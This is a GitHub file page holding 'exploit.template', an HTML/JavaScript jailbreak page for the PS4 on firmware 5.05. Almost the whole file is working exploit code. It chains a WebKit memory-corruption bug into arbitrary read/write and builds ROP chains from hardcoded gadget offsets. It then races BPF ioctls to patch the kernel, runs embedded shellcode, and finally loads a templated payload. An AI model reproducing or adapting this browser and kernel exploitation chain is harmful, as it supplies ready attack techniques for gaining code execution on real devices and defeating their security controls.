-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathexploit.template
executable file
·1 lines (1 loc) · 21.6 KB
/
exploit.template
1
<!DOCTYPE html><html><head> <title>PS4Jailbreak 5.05</title> <meta name=viewport content="width=device-width, initial-scale=1"> <style>.config{position: absolute; left: 50%; top: 50%; margin: -75px 0 0 -75px; width: 120px; height: 120px;text-align: center;}.loader{position: absolute; left: 50%; top: 50%; margin: -75px 0 0 -75px; border: 10px solid #f3f3f3; border-radius: 50%; border-top: 10px solid #044595; border-left: 10px solid #044595; width: 120px; height: 120px; -webkit-animation: spin 1s linear infinite}.info{overflow: hidden; position: fixed; position: absolute; top: 50%; left: 50%; font-size: 45px; font-family: sans-serif; transform: translate(-50%, -50%)}.credits{overflow: hidden; position: fixed; position: absolute; top: 90%; left: 50%; font-size: 16px; font-family: sans-serif; text-align: center; transform: translate(-50%, -90%)}@-webkit-keyframes spin{0%{-webkit-transform: rotate(0deg)}100%{-webkit-transform: rotate(360deg)}}</style></head><body style=margin:0> <div id=loader class=config>Configuration: <select id=config><option value="" selected disabled hidden>--</option><option value="1337">Install Cache</option><option value="1">Install Cache + Add Browser Hack</option><option value="0">Install Cache + Remove Browser Hack</option></select></div><div id=done class=info style=display:none>Done.</div><div id=fail class=info style=display:none>Fail!</div><div id=footer class=credits> <ul style=list-style:none;padding-left:0> <li><a href=#>qwertyoruiopz</a></li><li><a href=#>flatz</a></li><li><a href=#>specter</a></li><li><a href=#>xvortex</a></li><li>anonymous contributors</li></ul> </div><script>var p; var s={}; var g={}; var gc={"pop_r8": 96709, "pop_r9": 12268047, "pop_rax": 17397, "pop_rcx": 339545, "pop_rdx": 1826852, "pop_rsi": 586634, "pop_rdi": 232890, "pop_rsp": 124551, "jmp_rax": 130, "jmp_rdi": 2711166, "mov_rdx_rax": 3488561, "mov_rdi_rax": 22692143, "mov_rax_rdx": 1896224, "mov_rbp_rsp": 985418, "mov__rdi__rax": 3857131, "mov__rdi__rsi": 146114, "mov__rax__rsi": 2451047, "mov_rax__rax__": 444474, "mov_rax__rdi__": 290553, "add_rax_rsi": 1384646, "and_rax_rsi": 22481823, "add_rdi_rax": 5593055, "jop": 800720, "ret": 60, "stack_chk_fail": 200, "setjmp": 5368}; window.onload=function(){if (window.configuration){document.getElementById('loader').innerHTML='';document.getElementById('loader').className='loader';setTimeout(exploit, 3000);}else{document.getElementById('config').addEventListener('change', function(){window.configuration=this.value;window.onload();});}}; window.onerror=function(e){document.getElementById("loader").style.display="none"; document.getElementById("fail").style.display="block"; if (e.startsWith("Error:")==true){alert(e);}else{location.reload();};}; function done(){document.getElementById("loader").style.display="none"; document.getElementById("done").style.display="block";}; var rop=function(){this.stack=new Uint32Array(65536); this.stackBase=p.read8(p.leakval(this.stack).add32(16)); this.count=0; this.clear=function(){this.count=0; this.runtime=undefined; for (var i=0; i < 4080 / 2; i++){p.write8(this.stackBase.add32(i * 8), 0);};}; this.pushSymbolic=function(){this.count++; return this.count - 1;}; this.finalizeSymbolic=function(idx, val){p.write8(this.stackBase.add32(idx * 8), val);}; this.push=function(val){this.finalizeSymbolic(this.pushSymbolic(), val);}; this.push_write8=function(where, what){this.push(g.pop_rdi); this.push(where); this.push(g.pop_rsi); this.push(what); this.push(g.mov__rdi__rsi);}; this.fcall=function(rip, rdi, rsi, rdx, rcx, r8, r9){if (rdi !=undefined){this.push(g.pop_rdi); this.push(rdi);}; if (rsi !=undefined){this.push(g.pop_rsi); this.push(rsi);}; if (rdx !=undefined){this.push(g.pop_rdx); this.push(rdx);}; if (rcx !=undefined){this.push(g.pop_rcx); this.push(rcx);}; if (r8 !=undefined){this.push(g.pop_r8); this.push(r8);}; if (r9 !=undefined){this.push(g.pop_r9); this.push(r9);}; this.push(rip); return this;}; this.run=function(){var retv=p.loadchain(this, this.notimes); this.clear(); return retv;}; return this;}; function makeid(){var text=""; var possible="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i=0; i < 8; i++){text +=possible.charAt(Math.floor(Math.random() * possible.length));}; return text;}; var instancespr=[]; for (var i=0; i < 4096; i++){instancespr[i]=new Uint32Array(1); instancespr[i][makeid()]=50057;}; var _dview; function u2d(low, hi){if (!_dview) _dview=new DataView(new ArrayBuffer(16)); _dview.setUint32(0, hi); _dview.setUint32(4, low); return _dview.getFloat64(0);}; function zeroFill(number, width){width -=number.toString().length; if (width > 0){return new Array(width + (/\./.test(number) ? 2 : 1)).join("0") + number;}; return number + "";}; function int64(low, hi){this.low=(low >>> 0); this.hi=(hi >>> 0); this.add32=function(val){var new_lo=(((this.low >>> 0) + val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo < this.low){new_hi++;}; return new int64(new_lo, new_hi);}; this.add32inplace=function(val){var new_lo=(((this.low >>> 0) + val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo < this.low){new_hi++;}; this.hi=new_hi; this.low=new_lo;}; this.sub32=function(val){var new_lo=(((this.low >>> 0) - val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo > (this.low) & 4294967295){new_hi--;}; return new int64(new_lo, new_hi);}; this.sub32inplace=function(val){var new_lo=(((this.low >>> 0) - val) & 4294967295) >>> 0; var new_hi=(this.hi >>> 0); if (new_lo > (this.low) & 4294967295){new_hi--;}; this.hi=new_hi; this.low=new_lo;}; this.toString=function(val){val=16; var lo_str=(this.low >>> 0).toString(val); var hi_str=(this.hi >>> 0).toString(val); if (this.hi==0) return lo_str; else{lo_str=zeroFill(lo_str, 8);}; return hi_str + lo_str;}; return this;}; var nogc=[]; var tgt={a: 0, b: 0, c: 0, d: 0}; var y=new ImageData(1, 16384); postMessage("", "*", [y.data.buffer]); var props={}; for (var i=0; i < 16384 / 2;){props[i++]={value: 1111638594}; props[i++]={value: tgt};}; var foundLeak=undefined; var foundIndex=0; var maxCount=256; while (foundLeak==undefined && maxCount > 0){maxCount--; history.pushState(y, ""); Object.defineProperties({}, props); var leak=new Uint32Array(history.state.data.buffer); for (var i=0; i < leak.length - 6; i++){if (leak[i]==1111638594 && leak[i + 1]==4294901760 && leak[i + 2]==0 && leak[i + 3]==0 && leak[i + 4]==0 && leak[i + 5]==0 && leak[i + 6]==14 && leak[i + 7]==0 && leak[i + 10]==0 && leak[i + 11]==0 && leak[i + 12]==0 && leak[i + 13]==0 && leak[i + 14]==14 && leak[i + 15]==0){foundIndex=i; foundLeak=leak; break;};};}; if (!foundLeak){throw new Error("infoleak fail");}; Array.prototype.__defineGetter__(100, ()=> 1); var firstLeak=Array.prototype.slice.call(foundLeak, foundIndex, foundIndex + 64); var leakJSVal=new int64(firstLeak[8], firstLeak[9]); var f=document.body.appendChild(document.createElement("iframe")); var a=new f.contentWindow.Array(13.37, 13.37); var b=new f.contentWindow.Array(u2d(leakJSVal.low + 16, leakJSVal.hi), 13.37); var master=new Uint32Array(4096); var slave=new Uint32Array(4096); var leakval_u32=new Uint32Array(4096); var leakval_helper=[slave, 2, 3, 4, 5, 6, 7, 8, 9, 10]; tgt.a=u2d(2048, 23077632); tgt.b=0; tgt.c=leakval_helper; tgt.d=4919; var c=Array.prototype.concat.call(a, b); document.body.removeChild(f); var hax=c[0]; c[0]=0; tgt.c=c; hax[2]=0; hax[3]=0; Object.defineProperty(Array.prototype, 100,{get: undefined}); tgt.c=leakval_helper; var butterfly=new int64(hax[2], hax[3]); butterfly.low +=16; tgt.c=leakval_u32; var lkv_u32_old=new int64(hax[4], hax[5]); hax[4]=butterfly.low; hax[5]=butterfly.hi; tgt.c=master; hax[4]=leakval_u32[0]; hax[5]=leakval_u32[1]; var a2sb=new int64(master[4], master[5]); tgt.c=leakval_u32; hax[4]=lkv_u32_old.low; hax[5]=lkv_u32_old.hi; tgt.c=0; hax=0; var p={write8: function(addr, val){master[4]=addr.low; master[5]=addr.hi; if (val instanceof int64){slave[0]=val.low; slave[1]=val.hi;}else{slave[0]=val; slave[1]=0;}; master[4]=a2sb.low; master[5]=a2sb.hi;}, write4: function(addr, val){master[4]=addr.low; master[5]=addr.hi; slave[0]=val; master[4]=a2sb.low; master[5]=a2sb.hi;}, read8: function(addr){master[4]=addr.low; master[5]=addr.hi; var rtv=new int64(slave[0], slave[1]); master[4]=a2sb.low; master[5]=a2sb.hi; return rtv;}, read4: function(addr){master[4]=addr.low; master[5]=addr.hi; var rtv=slave[0]; master[4]=a2sb.low; master[5]=a2sb.hi; return rtv;}, leakval: function(jsval){leakval_helper[0]=jsval; var rtv=this.read8(butterfly); this.write8(butterfly, new int64(1094795585, 4294901760)); return rtv;}}; var get_jmptgt=function(addr){var z=p.read4(addr) & 65535; var y=p.read4(addr.add32(2)); if (z !=9727) return 0; return addr.add32(y + 6);}; var exploit=function(){p.leakfunc=function(func){var fptr_store=p.leakval(func); return (p.read8(fptr_store.add32(24))).add32(64);}; var parseFloatStore=p.leakfunc(parseFloat); var webKitBase=p.read8(parseFloatStore); webKitBase.low &=4294963200; webKitBase.sub32inplace(5881856 - 147456); var o2wk=function(o){return webKitBase.add32(o);}; for (var gn in gc){if (gc.hasOwnProperty(gn)){g[gn]=o2wk(gc[gn]);};}; var libKernelBase=p.read8(get_jmptgt(g.stack_chk_fail)); libKernelBase.low &=4294963200; libKernelBase.sub32inplace(53248 + 16384); var wkview=new Uint8Array(4096); var wkstr=p.leakval(wkview).add32(16); p.write8(wkstr, webKitBase); p.write4(wkstr.add32(8), 57131008); var hold1; var hold2; var holdz; var holdz1; while (1){hold1={a: 0, b: 0, c: 0, d: 0}; hold2={a: 0, b: 0, c: 0, d: 0}; holdz1=p.leakval(hold2); holdz=p.leakval(hold1); if (holdz.low - 48==holdz1.low) break;}; var pushframe=[]; pushframe.length=128; var funcbuf; var funcbuf32=new Uint32Array(256); nogc.push(funcbuf32); var launch_chain=function(chain){var stackPointer=0; var stackCookie=0; var orig_reenter_rip=0; var reenter_help={length:{valueOf: function(){orig_reenter_rip=p.read8(stackPointer); stackCookie=p.read8(stackPointer.add32(8)); var returnToFrame=stackPointer; var ocnt=chain.count; chain.push_write8(stackPointer, orig_reenter_rip); chain.push_write8(stackPointer.add32(8), stackCookie); if (chain.runtime) returnToFrame=chain.runtime(stackPointer); chain.push(g.pop_rsp); chain.push(returnToFrame); chain.count=ocnt; p.write8(stackPointer, (g.pop_rsp)); p.write8(stackPointer.add32(8), chain.stackBase);}}}; funcbuf=p.read8(p.leakval(funcbuf32).add32(16)); p.write8(funcbuf.add32(48), g.setjmp); p.write8(funcbuf.add32(128), g.jop); p.write8(funcbuf, funcbuf); p.write8(parseFloatStore, g.jop); var orig_hold=p.read8(holdz1); var orig_hold48=p.read8(holdz1.add32(72)); p.write8(holdz1, funcbuf.add32(80)); p.write8(holdz1.add32(72), funcbuf); parseFloat(hold2, hold2, hold2, hold2, hold2, hold2); p.write8(holdz1, orig_hold); p.write8(holdz1.add32(72), orig_hold48); stackPointer=p.read8(funcbuf.add32(16)); rtv=Array.prototype.splice.apply(reenter_help); return p.leakval(rtv);}; p.loadchain=launch_chain; var kview=new Uint8Array(4096); var kstr=p.leakval(kview).add32(16); p.write8(kstr, libKernelBase); p.write4(kstr.add32(8), 262144); var countbytes; for (var i=0; i < 262144; i++){if (kview[i]==114 && kview[i + 1]==100 && kview[i + 2]==108 && kview[i + 3]==111 && kview[i + 4]==99){countbytes=i; break;};}; p.write4(kstr.add32(8), countbytes + 32); var dview32=new Uint32Array(1); var dview8=new Uint8Array(dview32.buffer); for (var i=0; i < countbytes; i++){if (kview[i]==72 && kview[i + 1]==199 && kview[i + 2]==192 && kview[i + 7]==73 && kview[i + 8]==137 && kview[i + 9]==202 && kview[i + 10]==15 && kview[i + 11]==5){dview8[0]=kview[i + 3]; dview8[1]=kview[i + 4]; dview8[2]=kview[i + 5]; dview8[3]=kview[i + 6]; var syscallno=dview32[0]; s[syscallno]=libKernelBase.add32(i);};}; var chain=new rop(); var returnvalue; p.fcall_=function(rip, rdi, rsi, rdx, rcx, r8, r9){chain.clear(); chain.notimes=this.next_notime; this.next_notime=1; chain.fcall(rip, rdi, rsi, rdx, rcx, r8, r9); chain.push(g.pop_rdi); chain.push(chain.stackBase.add32(16376)); chain.push(g.mov__rdi__rax); chain.push(g.pop_rax); chain.push(p.leakval(1094795842)); if (chain.run().low !=1094795842){throw new Error("unexpected rop behaviour");}; returnvalue=p.read8(chain.stackBase.add32(16376));}; p.fcall=function(){p.fcall_.apply(this, arguments); return returnvalue;}; p.readstr=function(addr){var addr_=addr.add32(0); var rd=p.read4(addr_); var buf=""; while (rd & 255){buf +=String.fromCharCode(rd & 255); addr_.add32inplace(1); rd=p.read4(addr_);}; return buf;}; p.syscall=function(sysc, rdi, rsi, rdx, rcx, r8, r9){if (typeof sysc !="number"){throw new Error("invalid syscall");}; var off=s[sysc]; if (off==undefined){throw new Error("invalid syscall");}; return p.fcall(off, rdi, rsi, rdx, rcx, r8, r9);}; p.sptr=function(str){var bufView=new Uint8Array(str.length + 1); for (var i=0; i < str.length; i++){bufView[i]=str.charCodeAt(i) & 255;}; nogc.push(bufView); return p.read8(p.leakval(bufView).add32(16));}; p.malloc=function(sz){var backing=new Uint8Array(65536 + sz); nogc.push(backing); var ptr=p.read8(p.leakval(backing).add32(16)); ptr.backing=backing; return ptr;}; p.malloc32=function(sz){var backing=new Uint8Array(65536 + sz * 4); nogc.push(backing); var ptr=p.read8(p.leakval(backing).add32(16)); ptr.backing=new Uint32Array(backing.buffer); return ptr;}; var test=p.syscall(23, 0); if (test !="0"){var fd=p.syscall(5, p.sptr("/dev/bpf0"), 2).low; var fd1=p.syscall(5, p.sptr("/dev/bpf0"), 2).low; if (fd==(-1 >>> 0)){throw new Error("open bpf fail");}; var bpf_valid=p.malloc32(16384); var bpf_spray=p.malloc32(16384); var bpf_valid_u32=bpf_valid.backing; var bpf_valid_prog=p.malloc(64); p.write8(bpf_valid_prog, 2048 / 8); p.write8(bpf_valid_prog.add32(8), bpf_valid); var bpf_spray_prog=p.malloc(64); p.write8(bpf_spray_prog, 2048 / 8); p.write8(bpf_spray_prog.add32(8), bpf_spray); for (var i=0; i < 1024;){bpf_valid_u32[i++]=6; bpf_valid_u32[i++]=0;}; var rtv=p.syscall(54, fd, 2148549243, bpf_valid_prog); if (rtv.low !=0){throw new Error("ioctl bpf fail");}; var spawnthread=function(name, chain){var longjmp=webKitBase.add32(5352); var createThread=webKitBase.add32(7836560); var contextp=p.malloc32(8192); var contextz=contextp.backing; contextz[0]=1337; var thread2=new rop(); thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.ret); chain(thread2); p.write8(contextp, g.ret); p.write8(contextp.add32(16), thread2.stackBase); p.syscall(324, 1); var retv=function(){p.fcall(createThread, longjmp, contextp, p.sptr(name));}; nogc.push(contextp); nogc.push(thread2); return retv;}; var interrupt1, loop1; var sock=p.syscall(97, 2, 2); var kscratch=p.malloc32(4096); var start1=spawnthread("GottaGoFast", function(thread2){interrupt1=thread2.stackBase; thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.ret); thread2.push(g.pop_rdi); thread2.push(fd); thread2.push(g.pop_rsi); thread2.push(2148549243); thread2.push(g.pop_rdx); thread2.push(bpf_valid_prog); thread2.push(g.pop_rsp); thread2.push(thread2.stackBase.add32(2048)); thread2.count=256; var cntr=thread2.count; thread2.push(s[54]); thread2.push_write8(thread2.stackBase.add32(cntr * 8), s[54]); thread2.push(g.pop_rdi); var wherep=thread2.pushSymbolic(); thread2.push(g.pop_rsi); var whatp=thread2.pushSymbolic(); thread2.push(g.mov__rdi__rsi); thread2.push(g.pop_rsp); loop1=thread2.stackBase.add32(thread2.count * 8); thread2.push(1094795585); thread2.finalizeSymbolic(wherep, loop1); thread2.finalizeSymbolic(whatp, loop1.sub32(8));}); var krop=new rop(); var race=new rop(); var ctxp=p.malloc32(8192); var ctxp1=p.malloc32(8192); var ctxp2=p.malloc32(8192); p.write8(bpf_spray.add32(16), ctxp); p.write8(ctxp.add32(80), 0); p.write8(ctxp.add32(104), ctxp1); var stackshift_from_retaddr=0; p.write8(ctxp1.add32(16), o2wk(19536333)); stackshift_from_retaddr +=8 + 88; p.write8(ctxp.add32(0), ctxp2); p.write8(ctxp.add32(16), ctxp2.add32(8)); p.write8(ctxp2.add32(2000), o2wk(7271653)); var iterbase=ctxp2; for (var i=0; i < 15; i++){p.write8(iterbase, o2wk(19536333)); stackshift_from_retaddr +=8 + 88; p.write8(iterbase.add32(2000 + 32), o2wk(7271653)); p.write8(iterbase.add32(8), iterbase.add32(32)); p.write8(iterbase.add32(24), iterbase.add32(32 + 8)); iterbase=iterbase.add32(32);}; var raxbase=iterbase; var rdibase=iterbase.add32(8); var memcpy=get_jmptgt(webKitBase.add32(248)); memcpy=p.read8(memcpy); p.write8(raxbase, o2wk(22848539)); stackshift_from_retaddr +=8; p.write8(rdibase.add32(112), o2wk(19417140)); stackshift_from_retaddr +=8; p.write8(rdibase.add32(24), rdibase); p.write8(rdibase.add32(8), krop.stackBase); p.write8(raxbase.add32(48), g.mov_rbp_rsp); p.write8(rdibase, raxbase); p.write8(raxbase.add32(1056), o2wk(2566497)); p.write8(raxbase.add32(64), memcpy.add32(194 - 144)); var topofchain=stackshift_from_retaddr + 40; p.write8(rdibase.add32(176), topofchain); for (var i=0; i < 4096 / 8; i++){p.write8(krop.stackBase.add32(i * 8), g.ret);}; krop.count=16; var kpatch=function(offset, qword){krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(offset); krop.push(g.add_rax_rsi); krop.push(g.pop_rsi); krop.push(qword); krop.push(g.mov__rax__rsi);}; var kpatch2=function(offset, offset2){krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(offset); krop.push(g.add_rax_rsi); krop.push(g.mov_rdi_rax); krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(offset2); krop.push(g.add_rax_rsi); krop.push(g.mov__rdi__rax);}; p.write8(kscratch.add32(1056), g.pop_rdi); p.write8(kscratch.add32(64), g.pop_rax); p.write8(kscratch.add32(24), kscratch); krop.push(g.pop_rdi); krop.push(kscratch.add32(24)); krop.push(g.mov_rbp_rsp); var rboff=topofchain - krop.count * 8 + 40; krop.push(o2wk(2566497)); krop.push(g.pop_rax); krop.push(rboff); krop.push(g.add_rdi_rax); krop.push(g.mov_rax__rdi__); krop.push(g.pop_rsi); krop.push(762); krop.push(g.add_rax_rsi); krop.push(g.mov__rdi__rax); var shellbuf=p.malloc32(4096); krop.push(g.pop_rdi); krop.push(kscratch); krop.push(g.mov__rdi__rax); krop.push(g.pop_rsi); krop.push(808116); krop.push(g.add_rax_rsi); krop.push(g.pop_rdi); krop.push(kscratch.add32(8)); krop.push(g.mov__rdi__rax); krop.push(g.jmp_rax); krop.push(g.pop_rdi); krop.push(kscratch.add32(16)); krop.push(g.mov__rdi__rax); krop.push(g.pop_rsi); krop.push(new int64(4294901759, 4294967295)); krop.push(g.and_rax_rsi); krop.push(g.mov_rdx_rax); krop.push(g.pop_rax); krop.push(kscratch.add32(8)); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(9); krop.push(g.add_rax_rsi); krop.push(g.mov_rdi_rax); krop.push(g.mov_rax_rdx); krop.push(g.jmp_rdi); krop.push(g.pop_rax); krop.push(kscratch); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(221338); krop.push(g.add_rax_rsi); krop.push(g.mov_rax__rax__); krop.push(g.pop_rdi); krop.push(kscratch.add32(816)); krop.push(g.mov__rdi__rax); kpatch(221338, new int64(2425420344, 2425393296)); kpatch(20169540, shellbuf); kpatch(new int64(4293816070, 4294967295), new int64(184, 3297329408)); kpatch(new int64(4293470503, 4294967295), new int64(0, 1082624841)); kpatch(new int64(4293470533, 4294967295), new int64(2425388523, 1922076816)); kpatch(new int64(4294769332, 4294967295), new int64(934690871, 826654769)); kpatch(828366, new int64(233, 2336788480)); kpatch(1329844, new int64(2428747825, 2425393296)); kpatch(new int64(15789236, 0), new int64(2, 0)); kpatch2(new int64(15789244, 0), new int64(4293548276, 4294967295)); kpatch(new int64(15789276, 0), new int64(0, 1)); krop.push(g.pop_rax); krop.push(kscratch.add32(8)); krop.push(g.mov_rax__rax__); krop.push(g.pop_rsi); krop.push(9); krop.push(g.add_rax_rsi); krop.push(g.mov_rdi_rax); krop.push(g.pop_rax); krop.push(kscratch.add32(16)); krop.push(g.mov_rax__rax__); krop.push(g.jmp_rdi); krop.push(o2wk(380345)); krop.push(kscratch.add32(4096)); var kq=p.malloc32(16); var kev=p.malloc32(256); kev.backing[0]=sock; kev.backing[2]=131071; kev.backing[3]=1; kev.backing[4]=5; var shcode=[35817, 2425393152, 2425393296, 2425393296, 8567125, 2303246336, 1096172005, 1398030677, 2303275535, 3149957588, 256, 551862601, 1220806985, 9831821, 2370371584, 4265616532, 2370699263, 3767542964, 2370633744, 1585456300, 2169045059, 1265721540, 277432321, 4202255, 698, 3867757568, 524479, 3607052544, 960335176, 1207959552, 3224487561, 2211839809, 3698655723, 1103114587, 1096630620, 2428722526, 1032669269, 4294967160, 2303260209, 15293925, 1207959552, 770247, 2303262720, 3271888842, 1818324331, 979595116, 628633632, 1815490864, 2648, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; for (var i=0; i < shcode.length; i++){shellbuf.backing[i]=shcode[i];}; start1(); while (1){race.count=0; race.push(s[362]); race.push(g.pop_rdi); race.push(kq); race.push(g.mov__rdi__rax); race.push(g.ret); race.push(g.ret); race.push(g.ret); race.push(g.ret); race.push_write8(loop1, interrupt1); race.push(g.pop_rdi); race.push(fd); race.push(g.pop_rsi); race.push(2148549243); race.push(g.pop_rdx); race.push(bpf_valid_prog); race.push(s[54]); race.push(g.pop_rax); race.push(kq); race.push(g.mov_rax__rax__); race.push(g.mov_rdi_rax); race.push(g.pop_rsi); race.push(kev); race.push(g.pop_rdx); race.push(1); race.push(g.pop_rcx); race.push(0); race.push(g.pop_r8); race.push(0); race.push(s[363]); race.push(g.pop_rdi); race.push(fd1); race.push(g.pop_rsi); race.push(2148549243); race.push(g.pop_rdx); race.push(bpf_spray_prog); race.push(s[54]); race.push(g.pop_rax); race.push(kq); race.push(g.mov_rax__rax__); race.push(g.mov_rdi_rax); race.push(s[6]); race.run(); if (kscratch.backing[0] !=0){p.syscall(74, shellbuf, 16384, 7); p.fcall(shellbuf); break;};};}; var createThread=webKitBase.add32(7836560); var payloadbuf=p.malloc32(16384);### if (payload.indexOf(1337) > -1){payload[payload.indexOf(1337)]=parseInt(window.configuration);} for (var i=0; i < payload.length; i++){payloadbuf.backing[i]=payload[i];}; p.syscall(74, payloadbuf, 65536, 7); p.syscall(324, 1); p.fcall(createThread, payloadbuf, 0, p.sptr("payload")); done();}</script></body></html>